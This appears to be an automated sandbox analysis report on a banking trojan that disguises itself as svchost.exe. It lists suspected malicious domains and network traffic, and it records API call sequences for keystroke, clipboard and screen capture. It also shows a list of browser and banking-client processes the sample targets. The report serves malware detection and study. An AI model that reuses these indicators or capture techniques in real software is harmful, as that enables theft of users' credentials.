Source: svchost.exe, 00000002.00000003.2349262173.0000000008730000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.0000000008719000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2367201179.000000000582E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359436264.00000000033BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350147998.00000000033BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2383904533.000000000586C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2621492220.00000000058BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.0000000008721000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.000000000872F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553692894.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2378235533.0000000005848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2605320423.000000000338A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2367201179.0000000005839000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392137970.0000000005819000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319203666.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328874085.000000000872A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2318284670.000000000872A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2615047477.0000000000877000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745052967.000000000087A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.000000000872B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553216156.000000000581D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000002.00000003.2588423282.00000000058B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comtc
Source: svchost.exe, 00000002.00000003.2332778027.0000000008726000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.0000000008726000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2367567062.0000000008726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comtor
Source: svchost.exe, 00000002.00000003.2647147524.00000000033B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2782999579.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548644683.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577142640.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283877538.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540861567.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565873151.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2593214354.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610458260.00000000033B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746258983.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577027028.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432750056.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3347214715.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2804489840.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502762166.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749882709.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2790342105.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396609066.00000000033B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://puzylyp.com/
Source: svchost.exe, 00000002.00000003.2395119588.0000000005815000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3401901735.0000000008633000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408310468.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400541211.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302424542.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433469264.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430808473.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391743825.0000000005833000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3397671666.0000000005805000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182114960.000000000860A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408240997.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548643584.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008637000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179562507.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341800126.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2162881496.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395669768.0000000005833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/login.php

Source: unknown	Network traffic detected: HTTP traffic on port 58868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63490
Source: unknown	Network traffic detected: HTTP traffic on port 64582 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63493
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64582
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58879
Source: unknown	Network traffic detected: HTTP traffic on port 63440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64574 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58899
Source: unknown	Network traffic detected: HTTP traffic on port 58879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59137
Source: unknown	Network traffic detected: HTTP traffic on port 64573 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64574
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63440
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64573
Source: unknown	Network traffic detected: HTTP traffic on port 63303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63420
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63303
Source: unknown	Network traffic detected: HTTP traffic on port 58867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63317
Source: unknown	Network traffic detected: HTTP traffic on port 63299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63493 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63299

Source: unknown	HTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.6:58866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:58867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:58868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:58879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:58899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:63303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:63317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:63420 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:63440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:63493 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.6:63490 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.6:59137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:59138 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:64574 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:64582 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Windows\apppatch\svchost.exe	Code function: [tab]	2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe	Code function: [del]	2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe	Code function: [del]	2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe	Code function: [ins]	2_2_02C81B80

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C81E60 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock,

2_2_02C81E60

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C78630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,	2_2_02C78630
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01748630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,	6_2_01748630
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03108630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,	7_2_03108630
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01528630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,	10_2_01528630

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C93950 GetDesktopWindow,GetWindowDC,CreateCompatibleDC,PathAddBackslashA,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,WriteFile,ReleaseDC,

2_2_02C93950

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C81B80 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,

2_2_02C81B80

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	2_2_02C86370
Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	2_2_02C86370
Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	2_2_02C86370
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	2_2_02C85890
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	2_2_02C85890
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	2_2_02C85890
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	2_2_02C85890
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	2_2_02C85890
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	2_2_02C85890
Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|	2_2_02C73510
